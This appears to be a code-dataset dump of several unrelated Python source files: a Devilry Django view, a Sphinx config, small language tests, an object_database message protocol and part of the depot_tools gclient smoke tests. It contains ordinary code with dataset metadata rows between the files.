] | 15 | 2015-04-06T06:18:43.000Z | 2021-02-24T12:28:30.000Z |
from django.utils.translation import pgettext_lazy, gettext_lazy
from cradmin_legacy import crapp
from cradmin_legacy.crinstance import reverse_cradmin_url
from cradmin_legacy.viewhelpers import listbuilderview
from cradmin_legacy.viewhelpers import listfilter
from devilry.apps.core import models as coremodels
from devilry.devilry_cradmin import devilry_listbuilder
class PeriodItemFrame(devilry_listbuilder.common.GoForwardLinkItemFrame):
    """Clickable list-item frame that links a period to the student's
    period-overview page."""
    valuealias = 'period'

    def get_url(self):
        # Deep-link into the ``devilry_student_period`` cradmin instance for
        # this period, landing on the overview app's index view.
        return reverse_cradmin_url(
            instanceid='devilry_student_period',
            appname='overview',
            roleid=self.period.id,
            viewname=crapp.INDEXVIEW_NAME,
        )

    def get_extra_css_classes_list(self):
        # CSS hook used by the frontend/tests to identify these frames.
        return ['devilry-student-listbuilder-period-itemframe']
class AllPeriodsView(listbuilderview.FilterListMixin, listbuilderview.View):
    """Student-facing, filterable list of every started period (course term)
    the requesting user is registered on."""
    model = coremodels.Period
    paginate_by = 30
    template_name = 'devilry_student/cradmin_student/allperiods/allperiods.django.html'
    value_renderer_class = devilry_listbuilder.period.StudentItemValue
    frame_renderer_class = PeriodItemFrame

    def get_pagetitle(self):
        # Page title rendered above the list.
        return pgettext_lazy('student allperiods', 'Your courses')

    def get_filterlist_url(self, filters_string):
        # URL that re-renders this view with the encoded filter state.
        return self.request.cradmin_app.reverse_appurl(
            crapp.INDEXVIEW_NAME,
            kwargs={'filters_string': filters_string})

    def add_filterlist_items(self, filterlist):
        # Single free-text search box matching period and subject names.
        filterlist.append(listfilter.django.single.textinput.Search(
            slug='search',
            label=gettext_lazy('Search'),
            label_is_screenreader_only=True,
            modelfields=[
                'long_name',
                'short_name',
                'parentnode__long_name',
                'parentnode__short_name',
            ]))

    def get_unfiltered_queryset_for_role(self, role):
        # Periods where the user is a related student and that have started,
        # annotated with per-user assignment count and final-exam
        # qualification, newest period first.
        return coremodels.Period.objects\
            .filter_user_is_relatedstudent(user=self.request.user)\
            .filter_has_started()\
            .extra_annotate_with_assignmentcount_for_studentuser(user=self.request.user)\
            .extra_annotate_with_user_qualifies_for_final_exam(user=self.request.user)\
            .select_related('parentnode')\
            .order_by('-start_time', 'parentnode__long_name')

    def get_no_items_message(self):
        # Shown when the (unfiltered) queryset is empty.
        return pgettext_lazy('student allperiods',
                             'You are not registered on any courses in Devilry.')
class App(crapp.App):
    """Cradmin app exposing AllPeriodsView as the index view; the URL may
    carry an optional trailing filter string."""
    appurls = [
        crapp.Url(r'^(?P<filters_string>.+)?$',
                  AllPeriodsView.as_view(),
                  name=crapp.INDEXVIEW_NAME),
    ]
| 35.826667 | 89 | 0.689245 |
eb8c662e82658c768f631a21d932d76c8b874fa7 | 7,764 | py | Python | docs/conf.py | brodykenrick/MAX72xx_SPI_Arduino | 49442c6308b0ecc74cd48b94af36426eeeb385ac | [
"MIT"
] | null | null | null | docs/conf.py | brodykenrick/MAX72xx_SPI_Arduino | 49442c6308b0ecc74cd48b94af36426eeeb385ac | [
"MIT"
] | null | null | null | docs/conf.py | brodykenrick/MAX72xx_SPI_Arduino | 49442c6308b0ecc74cd48b94af36426eeeb385ac | [
"MIT"
] | 1 | 2021-02-18T14:37:15.000Z | 2021-02-18T14:37:15.000Z | # -*- coding: utf-8 -*-
#
# LedControl documentation build configuration file, created by
# sphinx-quickstart on Mon Feb 4 12:31:17 2013.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'LedControl'
copyright = u'2013, Eberhard Fahle'

# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# NOTE(review): keep both values in sync with the library's release tags;
# Sphinx substitutes |version| and |release| independently.
# The short X.Y version.
version = '1.0.0'
# The full version, including alpha/beta/rc tags.
release = '1.0.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'LedControldoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'LedControl.tex', u'LedControl Documentation',
u'Eberhard Fahle', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'ledcontrol', u'LedControl Documentation',
[u'Eberhard Fahle'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'LedControl', u'LedControl Documentation',
u'Eberhard Fahle', 'LedControl', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
| 31.950617 | 80 | 0.714967 |
d69d64a19d679d5ee6d520c60cc8c0e2c45e92ff | 81 | py | Python | scope/nest1.py | shirai708/qiita | 545393820b5d6ab3b2bfccd7b38fa13f8782ed00 | [
"CC-BY-4.0"
] | 1 | 2020-03-24T06:06:18.000Z | 2020-03-24T06:06:18.000Z | scope/nest1.py | shirai708/qiita | 545393820b5d6ab3b2bfccd7b38fa13f8782ed00 | [
"CC-BY-4.0"
] | 1 | 2020-09-12T01:44:18.000Z | 2020-09-12T07:15:55.000Z | scope/nest1.py | kaityo256/qiita | 69c3cd50a01234a6f426189b07ec335a720a8b94 | [
"CC-BY-4.0"
] | 2 | 2019-11-18T05:46:46.000Z | 2020-04-27T09:56:24.000Z | def func1():
a = 10
def func2():
print(a)
func2()
func1()
| 8.1 | 16 | 0.432099 |
57d0ba451810538dd0bf7eabb0b2531cc575d398 | 191 | py | Python | tests/basics/dict_setdefault.py | learnforpractice/micropython-cpp | 004bc8382f74899e7b876cc29bfa6a9cc976ba10 | [
"MIT"
] | 13,648 | 2015-01-01T01:34:51.000Z | 2022-03-31T16:19:53.000Z | tests/basics/dict_setdefault.py | learnforpractice/micropython-cpp | 004bc8382f74899e7b876cc29bfa6a9cc976ba10 | [
"MIT"
] | 7,092 | 2015-01-01T07:59:11.000Z | 2022-03-31T23:52:18.000Z | tests/basics/dict_setdefault.py | learnforpractice/micropython-cpp | 004bc8382f74899e7b876cc29bfa6a9cc976ba10 | [
"MIT"
] | 4,942 | 2015-01-02T11:48:50.000Z | 2022-03-31T19:57:10.000Z | d = {}
print(d.setdefault(1))
print(d.setdefault(1))
print(d.setdefault(5, 42))
print(d.setdefault(5, 1))
print(d[1])
print(d[5])
d.pop(5)
print(d.setdefault(5, 1))
print(d[1])
print(d[5])
| 13.642857 | 26 | 0.643979 |
287177a637adfa9e7de4fb9e40eb93718e19f114 | 33 | py | Python | python/testData/refactoring/pullup/fieldMove/SuperClass.py | jnthn/intellij-community | 8fa7c8a3ace62400c838e0d5926a7be106aa8557 | [
"Apache-2.0"
] | 2 | 2019-04-28T07:48:50.000Z | 2020-12-11T14:18:08.000Z | python/testData/refactoring/pullup/fieldMove/SuperClass.py | Cyril-lamirand/intellij-community | 60ab6c61b82fc761dd68363eca7d9d69663cfa39 | [
"Apache-2.0"
] | 173 | 2018-07-05T13:59:39.000Z | 2018-08-09T01:12:03.000Z | python/testData/refactoring/pullup/fieldMove/SuperClass.py | Cyril-lamirand/intellij-community | 60ab6c61b82fc761dd68363eca7d9d69663cfa39 | [
"Apache-2.0"
] | 2 | 2020-03-15T08:57:37.000Z | 2020-04-07T04:48:14.000Z | class SuperClass(object):
pass | 16.5 | 25 | 0.757576 |
c2b36c0e034f97518c7fd39310faf4a9b39c3d0d | 355 | py | Python | fib.py | baduy9x/AlgorithmPractice | 9fb956aedf67c0515b66f2af93d8383dba697fec | [
"Apache-2.0"
] | null | null | null | fib.py | baduy9x/AlgorithmPractice | 9fb956aedf67c0515b66f2af93d8383dba697fec | [
"Apache-2.0"
] | null | null | null | fib.py | baduy9x/AlgorithmPractice | 9fb956aedf67c0515b66f2af93d8383dba697fec | [
"Apache-2.0"
] | null | null | null | class Solution(object):
def fib(self, n):
if n == 0 or n == 1:
return 1
if n == 2:
return 2
first = 1
second = 1
count = 0
while count <=n:
result = first + second
first = second
second = result
count += 1
if __name__ == __main__: | 22.1875 | 35 | 0.422535 |
9c2a7e9fa91a1e0923dbc8d2094e1425efdbeef1 | 9,500 | py | Python | object_database/messages.py | APrioriInvestments/object_database | d44b8432490b36b1ace67de0e23fb59f7ce9b529 | [
"Apache-2.0"
] | 2 | 2021-02-23T18:28:40.000Z | 2021-04-18T03:00:53.000Z | object_database/messages.py | APrioriInvestments/object_database | d44b8432490b36b1ace67de0e23fb59f7ce9b529 | [
"Apache-2.0"
] | 115 | 2019-10-08T18:32:58.000Z | 2021-02-12T20:16:14.000Z | object_database/messages.py | APrioriInvestments/object_database | d44b8432490b36b1ace67de0e23fb59f7ce9b529 | [
"Apache-2.0"
] | null | null | null | from typed_python import OneOf, Alternative, ConstDict, TupleOf, Tuple
from object_database.schema import (
SchemaDefinition,
ObjectId,
ObjectFieldId,
IndexId,
IndexValue,
FieldDefinition,
)
# Single-element list so the interval can be swapped at runtime while every
# reader observes the change through the shared reference.
_heartbeatInterval = [5.0]


def setHeartbeatInterval(newInterval):
    """Override the heartbeat interval (in seconds) used by connections."""
    _heartbeatInterval[0] = newInterval


def getHeartbeatInterval():
    """Return the currently configured heartbeat interval in seconds."""
    return _heartbeatInterval[0]
def MessageToStr(msg):
    """Render a message as a compact one-line summary for logging/debugging.

    Scalar attributes are shown verbatim; collection attributes are shown as
    '#<count>' so large payloads don't flood the logs. Only attributes that
    exist on the message (Alternative subtypes differ) are included.
    """

    def _clipped(value):
        # repr, truncated to 20 characters with the opening quote re-appended
        # so the clipped repr still reads as quoted text.
        text = repr(value)
        if len(text) > 20:
            text = text[:20] + text[0]
        return text

    summary = {}

    # Scalars rendered verbatim, in display order.
    for attr in ("schema", "name", "typename", "transaction_id"):
        if hasattr(msg, attr):
            summary[attr] = getattr(msg, attr)

    # Collections rendered as '#<count>'.
    for attr in ("writes", "set_adds", "set_removes", "mapping"):
        if hasattr(msg, attr):
            summary[attr] = f"#{len(getattr(msg, attr))}"

    # Only shown when non-empty.
    if hasattr(msg, "identities") and msg.identities:
        summary["identities"] = f"#{len(msg.identities)}"

    # Only shown when present; the index value is clipped to keep lines short.
    if hasattr(msg, "fieldname_and_value") and msg.fieldname_and_value is not None:
        fieldname, indexValue = msg.fieldname_and_value
        summary["fieldname_and_value"] = f"({fieldname}, {_clipped(indexValue)})"

    for attr in ("transaction_guid", "success"):
        if hasattr(msg, attr):
            summary[attr] = f"{getattr(msg, attr)}"

    if hasattr(msg, "values"):
        summary["values"] = f"#{len(msg.values)}"

    if hasattr(msg, "tid"):
        summary["tid"] = msg.tid

    if hasattr(msg, "index_values"):
        summary["index_values"] = f"#{len(msg.index_values)}"

    rendered = ", ".join(f"{k}={v}" for k, v in summary.items())
    return f"{type(msg).__name__}({rendered})"
# Protocol messages sent from database clients to the server over a channel.
ClientToServer = Alternative(
    "ClientToServer",
    # start a transaction. the 'transaction_guid' identifies the transaction
    # within the stream (it's not actually global). The transaction consists of
    # a set of writes to particular object and field ids
    # as well as additions/removals of objects from indices.
    # key_versions specifies the object/field ids that were read to produce
    # this transaction, and which must not have changed for this transaction to be
    # accepted, and 'index_versions' provides the same thing for the indices whose
    # states we read.
    # this can come in chunks, to prevent messages getting too large.
    TransactionData={
        "writes": ConstDict(ObjectFieldId, OneOf(None, bytes)),
        "set_adds": ConstDict(IndexId, TupleOf(ObjectId)),
        "set_removes": ConstDict(IndexId, TupleOf(ObjectId)),
        "key_versions": TupleOf(ObjectFieldId),
        "index_versions": TupleOf(IndexId),
        "transaction_guid": int,
    },
    # indicate that a transaction is complete. 'as_of_version' specifies the
    # transaction id that this was based off of.
    CompleteTransaction={"as_of_version": int, "transaction_guid": int},
    # sent periodically to keep the connection alive.
    Heartbeat={},
    # define a collection of types as we know them. The server will respond with
    # a mapping indicating how each type and field is matched to a fieldId.
    DefineSchema={"name": str, "definition": SchemaDefinition},
    # indicate we want to load a particular object. The server will respond with a
    # LazyLoadResponse providing the definition of the values.
    LoadLazyObject={"schema": str, "typename": str, "identity": ObjectId},
    # subscribe to a given type, and optionally, an index.
    # the schema and typename define the class of object. note that you may get data
    # for fields that you didn't define if somebody else has a broader definition of this
    # type.
    # the fieldname_and_value can be None, in which case this is a type-level subscription
    # or it can provide the name of an index and the index value to which we are subscribed,
    # in which case this is an index level subscription. For index-level subscriptions,
    # we'll also receive a list of object ids that contain the objects we know about. This set
    # will increase each time a value comes into our scope, and doesn't ever get smaller. The
    # server will continue to send us updates on all the objects in our scope, and the view
    # infrastructure is responsible for figuring out which objects to display.
    # if 'isLazy', then this is a 'lazy' subscription, meaning we'll get any updates on this
    # stream, but we won't get the values of the objects immediately (only their identities).
    # we have to lazy-load the objects if we want to read from them and they haven't changed.
    Subscribe={
        "schema": str,
        "typename": str,
        # send us only the subset of objects that have IndexValue as the value
        # the given field. The resulting response will contain this set of
        # identities, and we'll get a SubscriptionIncrease message every time
        # a new value gets added to our subscription
        "fieldname_and_value": OneOf(None, Tuple(str, IndexValue)),
        # load values when we first request them, instead of blocking on all the data.
        "isLazy": bool,
    },
    # send a round-trip message to the server. The server will respond with a FlushResponse.
    Flush={"guid": int},
    # Authenticate the channel. This must be the first message.
    Authenticate={"token": str},
    # request a connection id that will be dependent on 'parentId' existing.
    # this is used by proxies.
    RequestDependentConnectionId={"parentId": ObjectId, "guid": str},
    # indicate that a dependent connection id has died.
    DropDependentConnectionId={"connIdentity": ObjectId},
    # indicate that we may be getting new objects for this type
    # even if we have not subscribed to any indices.
    SubscribeNone={"schema": str, "typename": str},
    __str__=MessageToStr,
)
# Protocol messages sent from the server back to database clients.
ServerToClient = Alternative(
    "ServerToClient",
    # initialize the connection. transaction_num indicates the current transaction ID.
    # connIdentity tells us what our own connectionObject's identity is. identity_root
    # provides a block of object ids for us to allocate from.
    Initialize={"transaction_num": int, "connIdentity": ObjectId, "identity_root": int},
    # indicate whether a transaction was successful or not. If not, provide the reason
    TransactionResult={
        "transaction_guid": int,
        "success": bool,
        "badKey": OneOf(None, ObjectFieldId, IndexId, str),
    },
    # specify how each field in a schema is mapped.
    SchemaMapping={"schema": str, "mapping": ConstDict(FieldDefinition, int)},
    # respond to a Flush message
    FlushResponse={"guid": int},
    # respond with the data for a subscription request
    SubscriptionData={
        "schema": str,
        "typename": OneOf(None, str),
        "fieldname_and_value": OneOf(None, Tuple(str, IndexValue)),
        "values": ConstDict(ObjectFieldId, OneOf(None, bytes)),  # serialized field value
        "index_values": ConstDict(ObjectFieldId, OneOf(None, IndexValue)),
        "identities": OneOf(
            None, TupleOf(ObjectId)
        ),  # the identities in play if this is an index-level subscription
    },
    # sent by the server to clients before any transaction data on not-loaded lazy
    # objects to ensure that they can correctly understand the set add/remove semantics
    LazyTransactionPriors={"writes": ConstDict(ObjectFieldId, OneOf(None, bytes))},
    # sent in response to a LoadLazyObject request, carrying the object's values.
    LazyLoadResponse={
        "identity": ObjectId,
        "values": ConstDict(ObjectFieldId, OneOf(None, bytes)),
    },
    # sent in response to a lazy subscription, giving object identities
    # and index membership, but not values themselves.
    LazySubscriptionData={
        "schema": str,
        "typename": OneOf(None, str),
        "fieldname_and_value": OneOf(None, Tuple(str, IndexValue)),
        "identities": TupleOf(ObjectId),
        "index_values": ConstDict(ObjectFieldId, OneOf(None, IndexValue)),
    },
    # indicate that a subscription has completed.
    SubscriptionComplete={
        "schema": str,
        "typename": OneOf(None, str),
        "fieldname_and_value": OneOf(None, Tuple(str, IndexValue)),
        "tid": int,  # marker transaction id
    },
    # indicate that a subscription is getting larger because an object
    # has moved into our subscribed set.
    SubscriptionIncrease={
        "schema": str,
        "typename": str,
        "fieldname_and_value": Tuple(str, IndexValue),
        "identities": TupleOf(ObjectId),
        "transaction_id": int,
    },
    # we've been disconnected.
    Disconnected={},
    # receive some transaction data. We may not be subscribed to all fields
    # in this transaction
    Transaction={
        "writes": ConstDict(ObjectFieldId, OneOf(None, bytes)),
        "set_adds": ConstDict(IndexId, TupleOf(ObjectId)),
        "set_removes": ConstDict(IndexId, TupleOf(ObjectId)),
        "transaction_id": int,
    },
    # respond with a dependent connection id.
    DependentConnectionId={"guid": str, "connIdentity": ObjectId, "identity_root": int},
    __str__=MessageToStr,
)
| 41.85022 | 94 | 0.672737 |
046e2fe10a459fe976635d6f4a73a8af50b33f9b | 64,429 | py | Python | tests/gclient_smoketest.py | cybertk/depot_tools | 8ee6092bb79d18a82605d84dff2e64013a0c376c | [
"BSD-3-Clause"
] | 20 | 2015-12-07T06:08:27.000Z | 2021-11-08T11:06:18.000Z | tests/gclient_smoketest.py | cybertk/depot_tools | 8ee6092bb79d18a82605d84dff2e64013a0c376c | [
"BSD-3-Clause"
] | null | null | null | tests/gclient_smoketest.py | cybertk/depot_tools | 8ee6092bb79d18a82605d84dff2e64013a0c376c | [
"BSD-3-Clause"
] | 23 | 2015-05-05T08:22:59.000Z | 2021-11-10T06:24:46.000Z | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Smoke tests for gclient.py.
Shell out 'gclient' and run basic conformance tests.
This test assumes GClientSmokeBase.URL_BASE is valid.
"""
import logging
import os
import re
import subprocess
import sys
import unittest
ROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.insert(0, ROOT_DIR)
from testing_support.fake_repos import join, write
from testing_support.fake_repos import FakeReposTestBase, FakeRepoTransitive, \
FakeRepoSkiaDEPS
import gclient_utils
import scm as gclient_scm
import subprocess2
GCLIENT_PATH = os.path.join(ROOT_DIR, 'gclient')
COVERAGE = False
class GClientSmokeBase(FakeReposTestBase):
  """Base harness for gclient smoke tests.

  Provides helpers to shell out to the real gclient binary and to parse its
  block-structured output into pieces the tests can assert on.
  """

  def setUp(self):
    super(GClientSmokeBase, self).setUp()
    # Make sure it doesn't try to auto update when testing!
    self.env = os.environ.copy()
    self.env['DEPOT_TOOLS_UPDATE'] = '0'

  def gclient(self, cmd, cwd=None):
    """Runs gclient with |cmd| and returns (stdout, stderr, returncode).

    CRLF line endings in both output streams are normalized to LF.
    """
    if not cwd:
      cwd = self.root_dir
    if COVERAGE:
      # Don't use the wrapper script.
      cmd_base = ['coverage', 'run', '-a', GCLIENT_PATH + '.py']
    else:
      cmd_base = [GCLIENT_PATH]
    cmd = cmd_base + cmd
    process = subprocess.Popen(cmd, cwd=cwd, env=self.env,
                               stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                               shell=sys.platform.startswith('win'))
    (stdout, stderr) = process.communicate()
    logging.debug("XXX: %s\n%s\nXXX" % (' '.join(cmd), stdout))
    logging.debug("YYY: %s\n%s\nYYY" % (' '.join(cmd), stderr))
    # pylint: disable=E1103
    return (stdout.replace('\r\n', '\n'), stderr.replace('\r\n', '\n'),
            process.returncode)

  def untangle(self, stdout):
    """Sorts '<job>>line' prefixed parallel output back into per-job order."""
    tasks = {}
    remaining = []
    for line in stdout.splitlines(False):
      # Capture the full job number: the previous pattern r'^(\d)+>' only
      # retained the last matched digit, so with 10 or more parallel jobs
      # lines from e.g. job 12 were grouped with job 2.
      m = re.match(r'^(\d+)>(.*)$', line)
      if not m:
        remaining.append(line)
      else:
        self.assertEquals([], remaining)
        tasks.setdefault(int(m.group(1)), []).append(m.group(2))
    out = []
    for key in sorted(tasks.iterkeys()):
      out.extend(tasks[key])
    out.extend(remaining)
    return '\n'.join(out)

  def parseGclient(self, cmd, items, expected_stderr='', untangle=False):
    """Parse gclient's output to make it easier to test.

    If untangle is True, tries to sort out the output from parallel checkout."""
    (stdout, stderr, returncode) = self.gclient(cmd)
    if untangle:
      stdout = self.untangle(stdout)
    self.checkString(expected_stderr, stderr)
    self.assertEquals(0, returncode)
    return self.checkBlock(stdout, items)

  def splitBlock(self, stdout):
    """Split gclient's output into logical execution blocks.

    ___ running 'foo' at '/bar'
    (...)
    ___ running 'baz' at '/bar'
    (...)

    will result in 2 items of len((...).splitlines()) each.
    """
    results = []
    for line in stdout.splitlines(False):
      # Intentionally skips empty lines.
      if not line:
        continue
      if line.startswith('__'):
        match = re.match(r'^________ ([a-z]+) \'(.*)\' in \'(.*)\'$', line)
        if not match:
          match = re.match(r'^_____ (.*) is missing, synching instead$', line)
          if match:
            # Blah, it's when a dependency is deleted, we should probably not
            # output this message.
            results.append([line])
          elif (
              not re.match(
                  r'_____ [^ ]+ : Attempting rebase onto [0-9a-f]+...',
                  line) and
              not re.match(r'_____ [^ ]+ at [^ ]+', line)):
            # The two regexp above are a bit too broad, they are necessary only
            # for git checkouts.
            self.fail(line)
        else:
          results.append([[match.group(1), match.group(2), match.group(3)]])
      else:
        if not results:
          # TODO(maruel): gclient's git stdout is inconsistent.
          # This should fail the test instead!!
          pass
        else:
          results[-1].append(line)
    return results

  def checkBlock(self, stdout, items):
    """Asserts the parsed blocks match the expected (verb, path) items."""
    results = self.splitBlock(stdout)
    for i in xrange(min(len(results), len(items))):
      if isinstance(items[i], (list, tuple)):
        verb = items[i][0]
        path = items[i][1]
      else:
        verb = items[i]
        path = self.root_dir
      self.checkString(results[i][0][0], verb, (i, results[i][0][0], verb))
      if sys.platform == 'win32':
        # Make path lower case since casing can change randomly.
        self.checkString(
            results[i][0][2].lower(),
            path.lower(),
            (i, results[i][0][2].lower(), path.lower()))
      else:
        self.checkString(results[i][0][2], path, (i, results[i][0][2], path))
    self.assertEquals(len(results), len(items), (stdout, items, len(results)))
    return results

  @staticmethod
  def svnBlockCleanup(out):
    """Work around svn status difference between svn 1.5 and svn 1.6

    I don't know why but on Windows they are reversed. So sorts the items."""
    for i in xrange(len(out)):
      if len(out[i]) < 2:
        continue
      out[i] = [out[i][0]] + sorted([x[1:].strip() for x in out[i][1:]])
    return out
class GClientSmoke(GClientSmokeBase):
  """Doesn't require either svnserve nor git-daemon."""
  @property
  def svn_base(self):
    # Fake url; these tests never hit the network.
    return 'svn://random.server/svn/'

  @property
  def git_base(self):
    # Fake url; these tests never hit the network.
    return 'git://random.server/git/'

  def testHelp(self):
    """testHelp: make sure no new command was added."""
    result = self.gclient(['help'])
    # Roughly, not too short, not too long.
    self.assertTrue(1000 < len(result[0]) and len(result[0]) < 2300,
                    'Too much written to stdout: %d bytes' % len(result[0]))
    self.assertEquals(0, len(result[1]))
    self.assertEquals(0, result[2])

  def testUnknown(self):
    # An unknown command prints the same help text and still exits 0.
    result = self.gclient(['foo'])
    # Roughly, not too short, not too long.
    self.assertTrue(1000 < len(result[0]) and len(result[0]) < 2300,
                    'Too much written to stdout: %d bytes' % len(result[0]))
    self.assertEquals(0, len(result[1]))
    self.assertEquals(0, result[2])

  def testNotConfigured(self):
    # Every subcommand that needs a .gclient file must error out without one.
    res = ('', 'Error: client not configured; see \'gclient config\'\n', 1)
    self.check(res, self.gclient(['cleanup']))
    self.check(res, self.gclient(['diff']))
    self.check(res, self.gclient(['pack']))
    self.check(res, self.gclient(['revert']))
    self.check(res, self.gclient(['revinfo']))
    self.check(res, self.gclient(['runhooks']))
    self.check(res, self.gclient(['status']))
    self.check(res, self.gclient(['sync']))
    self.check(res, self.gclient(['update']))

  def testConfig(self):
    # 'gclient config' must write the expected .gclient file for each
    # combination of flags, and reject inconsistent argument counts.
    p = join(self.root_dir, '.gclient')
    def test(cmd, expected):
      if os.path.exists(p):
        os.remove(p)
      results = self.gclient(cmd)
      self.check(('', '', 0), results)
      self.checkString(expected, open(p, 'rU').read())

    test(['config', self.svn_base + 'trunk/src/'],
         ('solutions = [\n'
          ' { "name" : "src",\n'
          ' "url" : "%strunk/src",\n'
          ' "deps_file" : "DEPS",\n'
          ' "managed" : True,\n'
          ' "custom_deps" : {\n'
          ' },\n'
          ' "safesync_url": "",\n'
          ' },\n'
          ']\n'
          'cache_dir = None\n') % self.svn_base)

    test(['config', self.git_base + 'repo_1', '--name', 'src'],
         ('solutions = [\n'
          ' { "name" : "src",\n'
          ' "url" : "%srepo_1",\n'
          ' "deps_file" : "DEPS",\n'
          ' "managed" : True,\n'
          ' "custom_deps" : {\n'
          ' },\n'
          ' "safesync_url": "",\n'
          ' },\n'
          ']\n'
          'cache_dir = None\n') % self.git_base)

    test(['config', 'foo', 'faa'],
         'solutions = [\n'
         ' { "name" : "foo",\n'
         ' "url" : "foo",\n'
         ' "deps_file" : "DEPS",\n'
         ' "managed" : True,\n'
         ' "custom_deps" : {\n'
         ' },\n'
         ' "safesync_url": "faa",\n'
         ' },\n'
         ']\n'
         'cache_dir = None\n')

    test(['config', 'foo', '--deps', 'blah'],
         'solutions = [\n'
         ' { "name" : "foo",\n'
         ' "url" : "foo",\n'
         ' "deps_file" : "blah",\n'
         ' "managed" : True,\n'
         ' "custom_deps" : {\n'
         ' },\n'
         ' "safesync_url": "",\n'
         ' },\n'
         ']\n'
         'cache_dir = None\n')

    test(['config', '--spec', '["blah blah"]'], '["blah blah"]')

    os.remove(p)
    results = self.gclient(['config', 'foo', 'faa', 'fuu'])
    err = ('Usage: gclient.py config [options] [url] [safesync url]\n\n'
           'gclient.py: error: Inconsistent arguments. Use either --spec or one'
           ' or 2 args\n')
    self.check(('', err, 2), results)
    self.assertFalse(os.path.exists(join(self.root_dir, '.gclient')))

  def testSolutionNone(self):
    # A solution whose url is None must be a no-op for every subcommand.
    results = self.gclient(['config', '--spec',
                            'solutions=[{"name": "./", "url": None}]'])
    self.check(('', '', 0), results)
    results = self.gclient(['sync'])
    self.check(('', '', 0), results)
    self.assertTree({})
    results = self.gclient(['revinfo'])
